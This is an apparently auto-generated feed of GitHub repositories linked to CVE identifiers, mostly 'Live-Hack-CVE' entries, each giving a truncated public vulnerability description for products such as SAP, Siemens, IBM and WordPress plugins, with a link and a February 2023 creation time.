**A vulnerability was found in GNU C Library 2.38. It has been declared as critical. This vulnerability affects the function __monstartup of the file gmon.c of the component Call Graph Monitor. The manipulation leads to buffer overflow. It is recommended to apply a patch to fix this issue. VDB-220246 is the identifier as CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0687](https://github.com/Live-Hack-CVE/CVE-2023-0687) create time: 2023-02-14T19:39:01Z

**The (1) Java GUI and (2) Web GUI components in the IBM Tivoli Storage Manager (TSM) Backup-Archive client 5.4 and 5.5 before 5.5.4.4 on AIX, Linux, and Solaris; 5.4.x and 5.5.x on Windows and z/OS; 6.1 before 6.1.5.7 on z/OS; 6.1 and 6.2 before 6.2.5.2 on Windows, before 6.2.5.3 on AIX and Linux x86, and before 6.2.5.4 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-6195](https://github.com/Live-Hack-CVE/CVE-2014-6195) create time: 2023-02-14T18:33:17Z

**IBM MQ 9.2 CD and LTS are vulnerable to a denial of service attack caused by an error processing connecting applications. IBM X-Force ID: 190833. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4870](https://github.com/Live-Hack-CVE/CVE-2020-4870) create time: 2023-02-14T18:33:13Z

**IBM InfoSphere Master Data Management Server 11.6 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 186324. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-4675](https://github.com/Live-Hack-CVE/CVE-2020-4675) create time: 2023-02-14T18:33:09Z

**IBM Sterling Secure Proxy 6.0.1, 6.0.2, 2.4.3.2, and 3.4.3.2 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. IBM X-Force ID: 201160. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29728](https://github.com/Live-Hack-CVE/CVE-2021-29728) create time: 2023-02-14T18:33:05Z

**IBM Sterling Secure Proxy 6.0.1, 6.0.2, 2.4.3.2, and 3.4.3.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-ForceID: 201100. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29723](https://github.com/Live-Hack-CVE/CVE-2021-29723) create time: 2023-02-14T18:33:01Z

**IBM Sterling Secure Proxy 6.0.1, 6.0.2, 2.4.3.2, and 3.4.3.2 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 201095. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29722](https://github.com/Live-Hack-CVE/CVE-2021-29722) create time: 2023-02-14T18:32:58Z

**IBM Financial Transaction Manager 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 205045. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29841](https://github.com/Live-Hack-CVE/CVE-2021-29841) create time: 2023-02-14T18:32:54Z

**An Untrusted Pointer Dereference was discovered in function mrb_vm_exec in mruby before 3.1.0-rc. The vulnerability causes a segmentation fault and application crash. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46023](https://github.com/Live-Hack-CVE/CVE-2021-46023) create time: 2023-02-14T18:32:37Z

**A reflected cross-site scripting (XSS) vulnerability exists in System Diagnostics Manager of B&R Automation Runtime versions >=3.00 and <=C4.93 that enables a remote attacker to execute arbitrary JavaScript in the context of the users browser session. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4286](https://github.com/Live-Hack-CVE/CVE-2022-4286) create time: 2023-02-14T18:33:23Z

**Dell EMC Unity versions before 5.2.0.0.5.173 , use(es) broken cryptographic algorithm. A remote unauthenticated attacker could potentially exploit this vulnerability by performing MitM attacks and let attackers obtain sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-22564](https://github.com/Live-Hack-CVE/CVE-2022-22564) create time: 2023-02-14T18:32:41Z

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the webWlanIdx parameter in the setWebWlanIdx function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24161](https://github.com/Live-Hack-CVE/CVE-2023-24161) create time: 2023-02-14T18:33:34Z

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the admuser parameter in the setPasswordCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24160](https://github.com/Live-Hack-CVE/CVE-2023-24160) create time: 2023-02-14T18:33:30Z

**TOTOLINK CA300-PoE V6.2c.884 was discovered to contain a command injection vulnerability via the admpass parameter in the setPasswordCfg function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24159](https://github.com/Live-Hack-CVE/CVE-2023-24159) create time: 2023-02-14T18:33:26Z

**@fastify/multipart is a Fastify plugin to parse the multipart content-type. Prior to versions 7.4.1 and 6.0.1, @fastify/multipart may experience denial of service due to a number of situations in which an unlimited number of parts are accepted. This includes the multipart body parser accepting an unlimited number of fi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25576](https://github.com/Live-Hack-CVE/CVE-2023-25576) create time: 2023-02-14T18:32:45Z

**A vulnerability has been identified in JT Open (All versions < V11.2.3.0), JT Utilities (All versions < V13.2.3.0). The affected application contains a memory corruption vulnerability while parsing specially crafted JT files. This could allow an attacker to execute code in the context of the current process. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47977](https://github.com/Live-Hack-CVE/CVE-2022-47977) create time: 2023-02-14T15:16:32Z

**A vulnerability has been identified in JT Open (All versions < V11.2.3.0), JT Utilities (All versions < V13.2.3.0), Parasolid V34.0 (All versions < V34.0.252), Parasolid V34.1 (All versions < V34.1.242), Parasolid V35.0 (All versions < V35.0.170), Parasolid V35.1 (All versions < V35.1.150). The affected application con CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-47936](https://github.com/Live-Hack-CVE/CVE-2022-47936) create time: 2023-02-14T15:16:28Z

**A vulnerability has been identified in TIA Multiuser Server V14 (All versions), TIA Multiuser Server V15 (All versions < V15.1 Update 8), TIA Project-Server (All versions < V1.1), TIA Project-Server V16 (All versions), TIA Project-Server V17 (All versions). Affected applications contain an untrusted search path vulnera CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-35868](https://github.com/Live-Hack-CVE/CVE-2022-35868) create time: 2023-02-14T15:16:24Z

**A vulnerability has been identified in SiPass integrated AC5102 (ACC-G2) (All versions < V2.85.44), SiPass integrated ACC-AP (All versions < V2.85.43). Affected devices improperly sanitize user input on the telnet command line interface. This could allow an authenticated user to escalate privileges by injecting arbitra CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-31808](https://github.com/Live-Hack-CVE/CVE-2022-31808) create time: 2023-02-14T15:16:20Z

**A vulnerability has been identified in Solid Edge SE2022 (All versions < V2210Update12), Solid Edge SE2023 (All versions < V2023Update2). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24557](https://github.com/Live-Hack-CVE/CVE-2023-24557) create time: 2023-02-14T15:17:15Z

**A vulnerability has been identified in Solid Edge SE2022 (All versions < V2210Update12), Solid Edge SE2023 (All versions < V2023Update2). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24556](https://github.com/Live-Hack-CVE/CVE-2023-24556) create time: 2023-02-14T15:17:11Z

**A vulnerability has been identified in Solid Edge SE2022 (All versions < V2210Update12), Solid Edge SE2023 (All versions < V2023Update2). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24555](https://github.com/Live-Hack-CVE/CVE-2023-24555) create time: 2023-02-14T15:17:07Z

**A vulnerability has been identified in Solid Edge SE2022 (All versions < V2210Update12), Solid Edge SE2023 (All versions < V2023Update2). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24554](https://github.com/Live-Hack-CVE/CVE-2023-24554) create time: 2023-02-14T15:17:03Z

**A vulnerability has been identified in Solid Edge SE2022 (All versions < V2210Update12), Solid Edge SE2023 (All versions < V2023Update2). The affected applications contain an out of bounds read past the end of an allocated structure while parsing specially crafted PAR files. This could allow an attacker to execute code CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24553](https://github.com/Live-Hack-CVE/CVE-2023-24553) create time: 2023-02-14T15:16:59Z

**A vulnerability has been identified in Solid Edge SE2022 (All versions < V2210Update12), Solid Edge SE2023 (All versions < V2023Update2). The affected application contains an out of bounds read past the end of an allocated buffer while parsing a specially crafted PAR file. This could allow an attacker to to execute cod CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24552](https://github.com/Live-Hack-CVE/CVE-2023-24552) create time: 2023-02-14T15:16:55Z

**A vulnerability has been identified in Solid Edge SE2022 (All versions < V2210Update12), Solid Edge SE2023 (All versions < V2023Update2). The affected application is vulnerable to heap-based buffer underflow while parsing specially crafted PAR files. An attacker could leverage this vulnerability to execute code in the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24551](https://github.com/Live-Hack-CVE/CVE-2023-24551) create time: 2023-02-14T15:16:51Z

**A vulnerability has been identified in Solid Edge SE2022 (All versions < V2210Update12), Solid Edge SE2023 (All versions < V2023Update2). The affected application is vulnerable to heap-based buffer while parsing specially crafted PAR files. An attacker could leverage this vulnerability to execute code in the context of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24550](https://github.com/Live-Hack-CVE/CVE-2023-24550) create time: 2023-02-14T15:16:47Z

**A vulnerability has been identified in Solid Edge SE2022 (All versions < V2210Update12), Solid Edge SE2023 (All versions < V2023Update2). The affected application is vulnerable to stack-based buffer while parsing specially crafted PAR files. An attacker could leverage this vulnerability to execute code in the context o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24549](https://github.com/Live-Hack-CVE/CVE-2023-24549) create time: 2023-02-14T15:16:44Z

**A vulnerability has been identified in COMOS V10.2 (All versions), COMOS V10.3.3.1 (All versions < V10.3.3.1.45), COMOS V10.3.3.2 (All versions < V10.3.3.2.33), COMOS V10.3.3.3 (All versions < V10.3.3.3.9), COMOS V10.3.3.4 (All versions < V10.3.3.4.6), COMOS V10.4.0.0 (All versions < V10.4.0.0.31), COMOS V10.4.1.0 (All CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24482](https://github.com/Live-Hack-CVE/CVE-2023-24482) create time: 2023-02-14T15:16:40Z

**A vulnerability has been identified in Mendix Applications using Mendix 7 (All versions < V7.23.34), Mendix Applications using Mendix 8 (All versions < V8.18.23), Mendix Applications using Mendix 9 (All versions < V9.22.0), Mendix Applications using Mendix 9 (V9.12) (All versions < V9.12.10), Mendix Applications using CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23835](https://github.com/Live-Hack-CVE/CVE-2023-23835) create time: 2023-02-14T15:16:36Z

**TimescaleDB, an open-source time-series SQL database, has a privilege escalation vulnerability in versions 2.8.0 through 2.9.2. During installation, TimescaleDB creates a telemetry job that is runs as the installation user. The queries run as part of the telemetry data collection were not run with a locked down `search CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25149](https://github.com/Live-Hack-CVE/CVE-2023-25149) create time: 2023-02-14T15:16:16Z

**Apache Sling JCR Base < 3.1.12 has a critical injection vulnerability when running on old JDK versions (JDK 1.8.191 or earlier) through utility functions in RepositoryAccessor. The functions getRepository and getRepositoryFromURL allow an application to access data stored in a remote location via JDNI and RMI. Users of CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25141](https://github.com/Live-Hack-CVE/CVE-2023-25141) create time: 2023-02-14T15:16:12Z

**Cross-site Scripting (XSS) - Stored in GitHub repository pimcore/pimcore prior to 1.5.17. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0827](https://github.com/Live-Hack-CVE/CVE-2023-0827) create time: 2023-02-14T15:16:08Z

**The Drag & Drop Sales Funnel Builder for WordPress plugin before 2.6.9 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0173](https://github.com/Live-Hack-CVE/CVE-2023-0173) create time: 2023-02-14T15:16:03Z

**The jQuery T(-) Countdown Widget WordPress plugin before 2.3.24 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0171](https://github.com/Live-Hack-CVE/CVE-2023-0171) create time: 2023-02-14T15:15:59Z

**The WP VR WordPress plugin before 8.2.7 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0174](https://github.com/Live-Hack-CVE/CVE-2023-0174) create time: 2023-02-14T15:15:55Z

**The Tutor LMS WordPress plugin before 2.0.10 does not sanitise and escape the reset_key and user_id parameters before outputting then back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0236](https://github.com/Live-Hack-CVE/CVE-2023-0236) create time: 2023-02-14T15:15:52Z

**The Annual Archive WordPress plugin before 1.6.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0178](https://github.com/Live-Hack-CVE/CVE-2023-0178) create time: 2023-02-14T15:15:48Z

**The Giveaways and Contests by RafflePress WordPress plugin before 1.11.3 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0176](https://github.com/Live-Hack-CVE/CVE-2023-0176) create time: 2023-02-14T15:15:44Z

**An out-of-bounds write issue exists in the DXF file-recovering procedure in the Drawings SDK (All versions prior to 2022.4) resulting from the lack of proper validation of user-supplied data. This can result in a write past the end of an allocated buffer and allow attackers to cause a denial-of-service condition or exe CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32936](https://github.com/Live-Hack-CVE/CVE-2021-32936) create time: 2023-02-14T14:10:28Z

**An Out-of-Bounds Read vulnerability exists when reading a DXF file using Open Design Alliance Drawings SDK before 2022.11. The specific issue exists within the parsing of DXF files. Crafted data in a DXF file (an invalid dash counter in line types) can trigger a read past the end of an allocated buffer. An attacker can CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43391](https://github.com/Live-Hack-CVE/CVE-2021-43391) create time: 2023-02-14T14:10:22Z

**An Out-of-Bounds Write vulnerability exists when reading a DXF or DWG file using Open Design Alliance Drawings SDK before 2022.11. The specific issue exists within the parsing of DXF and DWG files. Crafted data in a DXF or DWG file (an invalid number of properties) can trigger a write operation past the end of an alloc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43336](https://github.com/Live-Hack-CVE/CVE-2021-43336) create time: 2023-02-14T14:10:17Z

**Cross-Site Request Forgery (CSRF) vulnerability in ExpressTech Quiz And Survey Master – Best Quiz, Exam and Survey Plugin for WordPress plugin <= 8.0.7 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-46862](https://github.com/Live-Hack-CVE/CVE-2022-46862) create time: 2023-02-14T14:09:46Z

**Cross-Site Request Forgery (CSRF) vulnerability in ShapedPlugin WP Tabs – Responsive Tabs Plugin for WordPress plugin <= 2.1.14 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25065](https://github.com/Live-Hack-CVE/CVE-2023-25065) create time: 2023-02-14T14:09:58Z

**Cross-Site Request Forgery (CSRF) vulnerability in Photon WP Material Design Icons for Page Builders plugin <= 1.4.2 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24382](https://github.com/Live-Hack-CVE/CVE-2023-24382) create time: 2023-02-14T14:09:54Z

**Cross-Site Request Forgery (CSRF) vulnerability in Ecwid Ecommerce Ecwid Ecommerce Shopping Cart plugin <= 6.11.3 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24377](https://github.com/Live-Hack-CVE/CVE-2023-24377) create time: 2023-02-14T14:09:50Z

**Poul-Henning Kamp md5crypt has insufficient algorithmic complexity and a consequently short runtime, which makes it easier for context-dependent attackers to discover cleartext passwords via a brute-force attack, as demonstrated by an attack using GPU hardware. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-3287](https://github.com/Live-Hack-CVE/CVE-2012-3287) create time: 2023-02-14T11:56:07Z

**Cross-Site Request Forgery (CSRF) vulnerability in Orchestrated Corona Virus (COVID-19) Banner & Live Data plugin <= 1.7.0.6 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-43469](https://github.com/Live-Hack-CVE/CVE-2022-43469) create time: 2023-02-14T11:56:11Z

**Cross-Site Request Forgery (CSRF) vulnerability in FolioVision FV Flowplayer Video Player plugin <= 7.5.30.7212 versions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25066](https://github.com/Live-Hack-CVE/CVE-2023-25066) create time: 2023-02-14T11:56:15Z

**Onekey Touch devices through 4.0.0 and Onekey Mini devices through 2.10.0 allow man-in-the-middle attackers to obtain the seed phase. The man-in-the-middle access can only be obtained after disassembling a device (i.e., here, "man-in-the-middle" does not refer to the attacker's position on an IP network). NOTE: the ven CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25758](https://github.com/Live-Hack-CVE/CVE-2023-25758) create time: 2023-02-14T11:56:03Z

**Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file).** : [rvizx/CVE-2022-28368](https://github.com/rvizx/CVE-2022-28368) create time: 2023-02-13T08:10:00Z

**** UNSUPPORTED WHEN ASSIGNED ** Cross-site request forgery (CSRF) vulnerability in Wired/Wireless LAN Pan/Tilt Network Camera CS-WMV02G all versions allows a remote unauthenticated attacker to hijack the authentication and conduct arbitrary operations by having a logged-in user to view a malicious page. NOTE: This vuln CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22375](https://github.com/Live-Hack-CVE/CVE-2023-22375) create time: 2023-02-14T06:27:50Z

**** UNSUPPORTED WHEN ASSIGNED ** Stored cross-site scripting vulnerability in Wired/Wireless LAN Pan/Tilt Network Camera CS-WMV02G all versions allows a network-adjacent authenticated attacker to inject an arbitrary script. NOTE: This vulnerability only affects products that are no longer supported by the developer. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-22370](https://github.com/Live-Hack-CVE/CVE-2023-22370) create time: 2023-02-14T06:27:47Z

**SonicWall Email Security contains a vulnerability that could permit a remote unauthenticated attacker access to an error page that includes sensitive information about users email addresses. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0655](https://github.com/Live-Hack-CVE/CVE-2023-0655) create time: 2023-02-14T06:27:43Z

**SAP NetWeaver AS ABAP (BSP Framework) application - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allow an unauthenticated attacker to inject the code that can be executed by the application over the network. On successful exploitation it can gain access to the sensitive information which le CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-25614](https://github.com/Live-Hack-CVE/CVE-2023-25614) create time: 2023-02-14T06:27:40Z

**SAP BusinessObjects Business Intelligence Platform (CMC) - versions 420, 430, allows an authenticated admin user to upload malicious code that can be executed by the application over the network. On successful exploitation, attacker can perform operations that may completely compromise the application causing high impa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24530](https://github.com/Live-Hack-CVE/CVE-2023-24530) create time: 2023-02-14T06:27:37Z

**Due to lack of proper input validation, BSP application (CRM_BSP_FRAME) - versions 700, 701, 702, 731, 740, 750, 751, 752, 75C, 75D, 75E, 75F, 75G, 75H, allow malicious inputs from untrusted sources, which can be leveraged by an attacker to execute a Reflected Cross-Site Scripting (XSS) attack. As a result, an attacker CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24529](https://github.com/Live-Hack-CVE/CVE-2023-24529) create time: 2023-02-14T06:27:33Z

**SAP Fiori apps for Travel Management in SAP ERP (My Travel Requests) - version 600, allows an authenticated attacker to exploit a certain misconfigured application endpoint to view sensitive data. This endpoint is normally exposed over the network and successful exploitation can lead to exposure of data like travel doc CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24528](https://github.com/Live-Hack-CVE/CVE-2023-24528) create time: 2023-02-14T06:27:30Z

**SAP CRM WebClient UI - versions WEBCUIF 748, 800, 801, S4FND 102, 103, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. On successful exploitation an authenticated attacker can cause limited impact on confidentiality of the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24525](https://github.com/Live-Hack-CVE/CVE-2023-24525) create time: 2023-02-14T06:27:26Z

**SAP S/4 HANA Map Treasury Correspondence Format Data does not perform necessary authorization check for an authenticated user, resulting in escalation of privileges. This could allow an attacker to delete the data with a high impact to availability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24524](https://github.com/Live-Hack-CVE/CVE-2023-24524) create time: 2023-02-14T06:27:22Z

**An attacker authenticated as a non-admin user with local access to a server port assigned to the SAP Host Agent (Start Service) - versions 7.21, 7.22, can submit a crafted ConfigureOutsideDiscovery request with an operating system command which will be executed with administrator privileges. The OS command can read or CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24523](https://github.com/Live-Hack-CVE/CVE-2023-24523) create time: 2023-02-14T06:27:19Z

**Due to insufficient input sanitization, SAP NetWeaver AS ABAP (Business Server Pages) - versions 700, 701, 702, 731, 740, allows an unauthenticated user to alter the current session of the user by injecting the malicious code over the network and gain access to the unintended data. This may lead to a limited impact on CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24522](https://github.com/Live-Hack-CVE/CVE-2023-24522) create time: 2023-02-14T06:27:15Z

**Due to insufficient input sanitization, SAP NetWeaver AS ABAP (BSP Framework) - versions 700, 701, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, allows an unauthenticated user to alter the current session of the user by injecting the malicious code over the network and gain access to the unintended data. This CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-24521](https://github.com/Live-Hack-CVE/CVE-2023-24521) create time: 2023-02-14T06:27:12Z

**SAP NetWeaver AS for ABAP and ABAP Platform - versions 740, 750, 751, 752, 753, 754, 755, 756, 757, 789, 790, allows an unauthenticated attacker to craft a link, which when clicked by an unsuspecting user can be used to redirect a user to a malicious site which could read or modify some sensitive information or expose CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23860](https://github.com/Live-Hack-CVE/CVE-2023-23860) create time: 2023-02-14T06:27:08Z

**SAP NetWeaver AS for ABAP and ABAP Platform - versions 740, 750, 751, 752, 753, 754, 755, 756, 757, 789, 790, allows an unauthenticated attacker to craft a malicious link, which when clicked by an unsuspecting user, can be used to read or modify some sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23859](https://github.com/Live-Hack-CVE/CVE-2023-23859) create time: 2023-02-14T06:27:04Z

**Due to insufficient input validation, SAP NetWeaver AS for ABAP and ABAP Platform - versions 740, 750, 751, 752, 753, 754, 755, 756, 757, 789, 790, allows an unauthenticated attacker to send a crafted URL to a user, and by clicking the URL, the tricked user accesses SAP and might be directed with the response to somewh CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23858](https://github.com/Live-Hack-CVE/CVE-2023-23858) create time: 2023-02-14T06:27:01Z

**In SAP BusinessObjects Business Intelligence (Web Intelligence user interface) - version 430, some calls return json with wrong content type in the header of the response. As a result, a custom application that calls directly the jsp of Web Intelligence DHTML may be vulnerable to XSS attacks. On successful exploitation CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23856](https://github.com/Live-Hack-CVE/CVE-2023-23856) create time: 2023-02-14T06:26:57Z

**SAP Solution Manager - version 720, allows an authenticated attacker to redirect users to a malicious site due to insufficient URL validation. A successful attack could lead an attacker to read or modify the information or expose the user to a phishing attack. As a result, it has a low impact to confidentiality, integr CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23855](https://github.com/Live-Hack-CVE/CVE-2023-23855) create time: 2023-02-14T06:26:54Z

**SAP NetWeaver Application Server for ABAP and ABAP Platform - versions 700, 701, 702, 731, 740, 750, 751, 752, does not perform necessary authorization checks for an authenticated user, resulting in escalation of privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23854](https://github.com/Live-Hack-CVE/CVE-2023-23854) create time: 2023-02-14T06:26:50Z

**An unauthenticated attacker in AP NetWeaver Application Server for ABAP and ABAP Platform - versions 700, 702, 731, 740, 750, 751, 752, 753, 754, 755, 756, 757, 789, 790, can craft a link which when clicked by an unsuspecting user can be used to redirect a user to a malicious site which could read or modify some sensit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23853](https://github.com/Live-Hack-CVE/CVE-2023-23853) create time: 2023-02-14T06:26:45Z

**SAP Solution Manager (System Monitoring) - version 720, does not sufficiently encode user-controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23852](https://github.com/Live-Hack-CVE/CVE-2023-23852) create time: 2023-02-14T06:26:42Z

**SAP Business Planning and Consolidation - versions 200, 300, allows an attacker with business authorization to upload any files (including web pages) without the proper file format validation. If other users visit the uploaded malicious web page, the attacker may perform actions on behalf of the users without their con CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-23851](https://github.com/Live-Hack-CVE/CVE-2023-23851) create time: 2023-02-14T06:26:37Z

**SAP Solution Manager (BSP Application) - version 720, allows an authenticated attacker to craft a malicious link, which when clicked by an unsuspecting user, can be used to read or modify some sensitive information or craft a payload which may restrict access to the desired resources. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0025](https://github.com/Live-Hack-CVE/CVE-2023-0025) create time: 2023-02-14T06:26:34Z

**SAP Solution Manager (BSP Application) - version 720, allows an authenticated attacker to craft a malicious link, which when clicked by an unsuspecting user, can be used to read or modify some sensitive information or craft a payload which may restrict access to the desired resources, resulting in Cross-Site Scripting CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0024](https://github.com/Live-Hack-CVE/CVE-2023-0024) create time: 2023-02-14T06:26:30Z

**SAP BusinessObjects Business Intelligence platform - versions 420, 430, allows an authenticated attacker to access sensitive information which is otherwise restricted. On successful exploitation, there could be a high impact on confidentiality and limited impact on integrity of the application. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0020](https://github.com/Live-Hack-CVE/CVE-2023-0020) create time: 2023-02-14T06:26:27Z

**In SAP GRC (Process Control) - versions GRCFND_A V1200, GRCFND_A V8100, GRCPINW V1100_700, GRCPINW V1100_731, GRCPINW V1200_750, remote-enabled function module in the proprietary SAP solution enables an authenticated attacker with minimal privileges to access all the confidential data stored in the database. Successful CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2023-0019](https://github.com/Live-Hack-CVE/CVE-2023-0019) create time: 2023-02-14T06:26:23Z

**KeePass CVE-2023-24055复现** : [zwlsix/KeePass-CVE-2023-24055](https://github.com/zwlsix/KeePass-CVE-2023-24055) create time: 2023-02-14T05:20:58Z

**KeePass CVE-2023-24055复现** : [zwlsix/KeePass-CVE-2023-24055](https://github.com/zwlsix/KeePass-CVE-2023-24055) create time: 2023-02-14T04:01:20Z

**A Cross Site Request Forgery issue has been discovered in GitLab CE/EE affecting all versions before 15.6.7, all versions starting from 15.7 before 15.7.6, and all versions starting from 15.8 before 15.8.1. An attacker could take over a project if an Owner or Maintainer uploads a file to a malicious project. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-4138](https://github.com/Live-Hack-CVE/CVE-2022-4138) create time: 2023-02-14T01:52:04Z

**An issue has been discovered in GitLab CE/EE affecting all versions starting from 14.3 before 15.6.7, all versions starting from 15.7 before 15.7.6, all versions starting from 15.8 before 15.8.1. An attacker may upload a crafted CI job artifact zip file in a project that uses dynamic child pipelines and make a sidekiq CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3759](https://github.com/Live-Hack-CVE/CVE-2022-3759) create time: 2023-02-14T01:52:00Z

**A lack of length validation in GitLab CE/EE affecting all versions from 12.4 before 15.6.7, 15.7 before 15.7.6, and 15.8 before 15.8.1 allows an authenticated attacker to create a large Issue description via GraphQL which, when repeatedly requested, saturates CPU usage. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3411](https://github.com/Live-Hack-CVE/CVE-2022-3411) create time: 2023-02-14T01:51:55Z

